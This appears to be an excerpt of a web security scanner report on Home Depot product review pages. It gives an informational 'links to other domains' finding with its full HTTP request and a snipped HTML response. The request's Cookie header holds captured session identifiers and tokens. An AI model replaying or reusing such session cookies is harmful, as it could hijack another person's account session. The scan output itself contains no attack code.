Connection: close

<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" conten
...[SNIP]...
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW" />
<script src="http://homedepot.ugc.bazaarvoice.com/static/1999q/bazaarvoice.js" type="text/javascript"></script>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/3_6/5/rating.gif" alt="3.6 / 5" title="3.6 / 5" class="" />
</div>
...[SNIP]...
<div id="BVRRRatingsHistogramButtonScript_aqutzo79929t9fqfo9brdre5a_ID" class="BVRRRatingsHistogramButtonScript BVRRHidden"> <img src="http://homedepot.ugc.bazaarvoice.com/static/1999q/openRatingsHistogram.gif"
alt="Open Ratings Snapshot"
name="BV_TrackingTag_Rating_Summary_1_ExpandHistogram_202642971"
class="BVRRRatingsHistogramButtonImage"
onmouseover="bvHistogramMouseover(this, 'BVRRHistogramTimer_pmc13hv1hqi8r0dho2tmi48cm_ID', 'BVRRRatingsHistogramButtonPopin_2loscafbpahn3baousn9pojx9_ID', 'RatingsHistogramFrame');"
onmouseout="bvHistogramMouseout('BVRRHistogramTimer_pmc13hv1hqi8r0dho2tmi48cm_ID', 'BVRRRatingsHistogramButtonPopin_2loscafbpahn3baousn9pojx9_ID', 500);" />
<div id="BVRRRatingsHistogramButtonPopin_2loscafbpahn3baousn9pojx9_ID" class="BVRRRatingsHistogramButtonPopin">
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_1_ExpandHistogram_202642971" target="_blank" href="http://reviews.homedepot.com/1999q/202642971/ratingsnapshot.htm"> <img src="http://homedepot.ugc.bazaarvoice.com/static/1999q/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/1_0/5/rating.gif" alt="1 / 5" title="1 / 5" class="" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
.href, null, 'resizable=1,status=1,scrollbars=1,width=800,height=600,top=0'); popupWin.focus(); bvStopPropagation(event); return false;" href="http://reviews.homedepot.com/1999q/281474984/profile.htm"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999q/more_reviews_icon.gif" alt="(read all my reviews)" /></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
.href, null, 'resizable=1,status=1,scrollbars=1,width=800,height=600,top=0'); popupWin.focus(); bvStopPropagation(event); return false;" href="http://reviews.homedepot.com/1999q/281114813/profile.htm"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999q/more_reviews_icon.gif" alt="(read all my reviews)" /></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/1_0/5/rating.gif" alt="1 / 5" title="1 / 5" class="" />
</div>
...[SNIP]...
.href, null, 'resizable=1,status=1,scrollbars=1,width=800,height=600,top=0'); popupWin.focus(); bvStopPropagation(event); return false;" href="http://reviews.homedepot.com/1999q/140006260/profile.htm"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999q/more_reviews_icon.gif" alt="(read all my reviews)" /></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/1_0/5/rating.gif" alt="1 / 5" title="1 / 5" class="" />
</div>
...[SNIP]...
.href, null, 'resizable=1,status=1,scrollbars=1,width=800,height=600,top=0'); popupWin.focus(); bvStopPropagation(event); return false;" href="http://reviews.homedepot.com/1999q/193228708/profile.htm"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999q/more_reviews_icon.gif" alt="(read all my reviews)" /></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/4_0/5/rating.gif" alt="4 / 5" title="4 / 5" class="" />
</div>
...[SNIP]...
.href, null, 'resizable=1,status=1,scrollbars=1,width=800,height=600,top=0'); popupWin.focus(); bvStopPropagation(event); return false;" href="http://reviews.homedepot.com/1999q/266229148/profile.htm"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999q/more_reviews_icon.gif" alt="(read all my reviews)" /></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999q/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
is.href, null, 'resizable=1,status=1,scrollbars=1,width=800,height=600,top=0'); popupWin.focus(); bvStopPropagation(event); return false;" href="http://reviews.homedepot.com/1999q/4623471/profile.htm"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999q/more_reviews_icon.gif" alt="(read all my reviews)" /></a>
...[SNIP]...

15.73. http://reviews.homedepot.com/1999s/202642971/reviews.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://reviews.homedepot.com
Path:	/1999s/202642971/reviews.htm

Issue detail

The page was loaded from a URL containing a query string:

http://reviews.homedepot.com/1999s/202642971/reviews.htm?format=embedded

The response contains the following links to other domains:

http://homedepot.ugc.bazaarvoice.com/1999s/1_0/5/rating.gif
http://homedepot.ugc.bazaarvoice.com/1999s/3_6/5/ratingLarge.gif
http://homedepot.ugc.bazaarvoice.com/1999s/4_0/5/rating.gif
http://homedepot.ugc.bazaarvoice.com/1999s/5_0/5/rating.gif
http://homedepot.ugc.bazaarvoice.com/static/1999s/bazaarvoice.js
http://homedepot.ugc.bazaarvoice.com/static/1999s/filteringBusy.gif
http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif
http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif
http://homedepot.ugc.bazaarvoice.com/static/1999s/more_reviews_icon.gif
http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif
http://homedepot.ugc.bazaarvoice.com/static/1999s/openRatingsHistogram.gif
http://homedepot.ugc.bazaarvoice.com/static/1999s/profileSnapshotLoading.gif

Request

GET /1999s/202642971/reviews.htm?format=embedded HTTP/1.1
Host: reviews.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay?langId=-1&storeId=10051&catalogId=10053&productId=202642971&R=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 156546
Cache-Control: no-cache, no-store
Expires: Thu, 16 Jun 2011 11:35:43 GMT
Date: Thu, 16 Jun 2011 11:35:43 GMT
Connection: close

<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" conten
...[SNIP]...
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW" />
<script src="http://homedepot.ugc.bazaarvoice.com/static/1999s/bazaarvoice.js" type="text/javascript"></script>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/3_6/5/ratingLarge.gif" alt="3.6 / 5" title="3.6 / 5" class="" />
</div>
...[SNIP]...
<div id="BVRRRatingsHistogramButtonScript_7i8lsmhi56q1kioe61kqkbgs2_ID" class="BVRRRatingsHistogramButtonScript BVRRHidden"> <img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/openRatingsHistogram.gif"
alt="Open Ratings Snapshot"
name="BV_TrackingTag_Rating_Summary_1_ExpandHistogram_202642971"
class="BVRRRatingsHistogramButtonImage"
onmouseover="bvHistogramMouseover(this, 'BVRRHistogramTimer_m5wyvxadapjhm586rz75g09tl_ID', 'BVRRRatingsHistogramButtonPopin_dfsbm9q5g83qq7ebgpedpx61l_ID', 'RatingsHistogramFrame');"
onmouseout="bvHistogramMouseout('BVRRHistogramTimer_m5wyvxadapjhm586rz75g09tl_ID', 'BVRRRatingsHistogramButtonPopin_dfsbm9q5g83qq7ebgpedpx61l_ID', 500);" />
<div id="BVRRRatingsHistogramButtonPopin_dfsbm9q5g83qq7ebgpedpx61l_ID" class="BVRRRatingsHistogramButtonPopin">
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_1_ExpandHistogram_202642971" target="_blank" href="http://reviews.homedepot.com/1999s/202642971/ratingsnapshot.htm"> <img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
m%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FBuildLinkToHomeDepot%3Flinktype%3Dproduct%26id%3D202642971&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
m%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FBuildLinkToHomeDepot%3Flinktype%3Dproduct%26id%3D202642971&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/3_6/5/ratingLarge.gif" alt="3.6 / 5" title="3.6 / 5" class="" />
</div>
...[SNIP]...
<div id="BVRRRatingsHistogramButtonScript_dnbq187roidxko1f2ow3afayv_ID" class="BVRRRatingsHistogramButtonScript BVRRHidden"> <img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/openRatingsHistogram.gif"
alt="Open Ratings Snapshot"
name="BV_TrackingTag_Rating_Summary_2_ExpandHistogram_202642971"
class="BVRRRatingsHistogramButtonImage"
onmouseover="bvHistogramMouseover(this, 'BVRRHistogramTimer_9savkdxawx2jb81pnjj1gjskk_ID', 'BVRRRatingsHistogramButtonPopin_htln9wg858smi89fp5oa9fkna_ID', 'RatingsHistogramFrame');"
onmouseout="bvHistogramMouseout('BVRRHistogramTimer_9savkdxawx2jb81pnjj1gjskk_ID', 'BVRRRatingsHistogramButtonPopin_htln9wg858smi89fp5oa9fkna_ID', 500);" />
<div id="BVRRRatingsHistogramButtonPopin_htln9wg858smi89fp5oa9fkna_ID" class="BVRRRatingsHistogramButtonPopin">
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_2_ExpandHistogram_202642971" target="_blank" href="http://reviews.homedepot.com/1999s/202642971/ratingsnapshot.htm"> <img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
m%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FBuildLinkToHomeDepot%3Flinktype%3Dproduct%26id%3D202642971&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
m%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FBuildLinkToHomeDepot%3Flinktype%3Dproduct%26id%3D202642971&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/3_6/5/ratingLarge.gif" alt="3.6 / 5" title="3.6 / 5" class="" />
</div>
...[SNIP]...
<div id="BVRRRatingsHistogramButtonScript_tu7n4hugrmt18x3gd8fsrxpr6_ID" class="BVRRRatingsHistogramButtonScript BVRRHidden"> <img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/openRatingsHistogram.gif"
alt="Open Ratings Snapshot"
name="BV_TrackingTag_QuickTakeSummary_ExpandHistogram_202642971"
class="BVRRRatingsHistogramButtonImage"
onmouseover="bvHistogramMouseover(this, 'BVRRHistogramTimer_6lio7oc1m11nn14vu4xo5dhyf_ID', 'BVRRRatingsHistogramButtonPopin_ldrffeolljl9fnsjz0kn00fgi_ID', 'RatingsHistogramFrame');"
onmouseout="bvHistogramMouseout('BVRRHistogramTimer_6lio7oc1m11nn14vu4xo5dhyf_ID', 'BVRRRatingsHistogramButtonPopin_ldrffeolljl9fnsjz0kn00fgi_ID', 500);" />
<div id="BVRRRatingsHistogramButtonPopin_ldrffeolljl9fnsjz0kn00fgi_ID" class="BVRRRatingsHistogramButtonPopin">
...[SNIP]...
<a name="BV_TrackingTag_QuickTakeSummary_ExpandHistogram_202642971" target="_blank" href="http://reviews.homedepot.com/1999s/202642971/ratingsnapshot.htm"> <img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
m%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FBuildLinkToHomeDepot%3Flinktype%3Dproduct%26id%3D202642971&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
m%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FBuildLinkToHomeDepot%3Flinktype%3Dproduct%26id%3D202642971&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/1_0/5/rating.gif" alt="1 / 5" title="1 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14978754&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14978754&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14890448&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14890448&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
n_pngk3rk99p1tgflb03np5p3yx_ID', 'http://reviews.homedepot.com/1999s/281474984/profilesnapshot.djs?format=embeddedhtml',
'ProfileSnapshotFrame'
) &&
BVAnalyticsTracker.fireActionEvent(this);
"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/more_reviews_icon.gif" alt="" /></a>
...[SNIP]...
<div class="BVDI_PSSnapshotLoading"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/profileSnapshotLoading.gif" alt="Please wait while more information about ruttle is loaded." title="Please wait while more information about ruttle is loaded."/></div>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14800962&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14800962&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
n_em1z07x73opj86prqvheuzxiu_ID', 'http://reviews.homedepot.com/1999s/281114813/profilesnapshot.djs?format=embeddedhtml',
'ProfileSnapshotFrame'
) &&
BVAnalyticsTracker.fireActionEvent(this);
"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/more_reviews_icon.gif" alt="" /></a>
...[SNIP]...
<div class="BVDI_PSSnapshotLoading"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/profileSnapshotLoading.gif" alt="Please wait while more information about bolesmower is loaded." title="Please wait while more information about bolesmower is loaded."/></div>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14792030&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14792030&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/1_0/5/rating.gif" alt="1 / 5" title="1 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
n_a5c3v8e2c7820ei18boscxbx5_ID', 'http://reviews.homedepot.com/1999s/140006260/profilesnapshot.djs?format=embeddedhtml',
'ProfileSnapshotFrame'
) &&
BVAnalyticsTracker.fireActionEvent(this);
"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/more_reviews_icon.gif" alt="" /></a>
...[SNIP]...
<div class="BVDI_PSSnapshotLoading"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/profileSnapshotLoading.gif" alt="Please wait while more information about rg620 is loaded." title="Please wait while more information about rg620 is loaded."/></div>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14691431&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14691431&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/5_0/5/rating.gif" alt="5 / 5" title="5 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14583254&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14583254&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/1_0/5/rating.gif" alt="1 / 5" title="1 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
n_sviqnrun1w484meygyze66u8o_ID', 'http://reviews.homedepot.com/1999s/193228708/profilesnapshot.djs?format=embeddedhtml',
'ProfileSnapshotFrame'
) &&
BVAnalyticsTracker.fireActionEvent(this);
"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/more_reviews_icon.gif" alt="" /></a>
...[SNIP]...
<div class="BVDI_PSSnapshotLoading"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/profileSnapshotLoading.gif" alt="Please wait while more information about moose267 is loaded." title="Please wait while more information about moose267 is loaded."/></div>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14460506&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
p-kohler-courage-front-engine-automatic-riding-mower-reviews%2Freviews.htm%3FreviewID%3D14460506&title=__TITLE__&robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://homedepot.ugc.bazaarvoice.com/static/1999s/link-twitter.gif"
alt="Twitter"
title="Tweet this"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://homedepot.ugc.bazaarvoice.com/1999s/4_0/5/rating.gif" alt="4 / 5" title="4 / 5" class="" />
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/noAvatar.gif" alt="Customer avatar" title="Customer avatar"/></span>
...[SNIP]...
n_egw64p8hrgwzsdt9fu9m4b2u8_ID', 'http://reviews.homedepot.com/1999s/266229148/profilesnapshot.djs?format=embeddedhtml',
'ProfileSnapshotFrame'
) &&
BVAnalyticsTracker.fireActionEvent(this);
"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/more_reviews_icon.gif" alt="" /></a>
...[SNIP]...
<div class="BVDI_PSSnapshotLoading"><img src="http://homedepot.ugc.bazaarvoice.com/static/1999s/profileSnapshotLoading.gif" alt="Please wait while more information about WandaK is loaded." title="Please wait while more information about WandaK is loaded."/></div>
...[SNIP]...
